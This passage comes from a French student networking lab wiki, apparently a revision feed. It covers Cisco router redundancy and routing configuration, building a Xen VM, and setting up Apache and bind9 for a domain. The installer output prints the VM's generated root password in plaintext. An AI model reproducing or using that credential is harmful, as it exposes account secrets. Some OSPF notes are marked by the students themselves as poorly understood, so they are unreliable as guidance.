   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248                      &lt;br /&gt;
   ipv6 address FE80::42:2 link-local                                         &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
Question pour Redon addresse Ip à définir &lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   int XXXX&lt;br /&gt;
   ip address 10.10.10.2 255.255.255.0&lt;br /&gt;
   vrrp 1 ip 10.10.10.3                     &lt;br /&gt;
   vrrp 1 preempt                          //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place&lt;br /&gt;
   vrrp 1 priority 100                     //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51285</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51285"/>
				<updated>2019-11-28T10:53:31Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Securisation d'un réseau Wi-Fi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
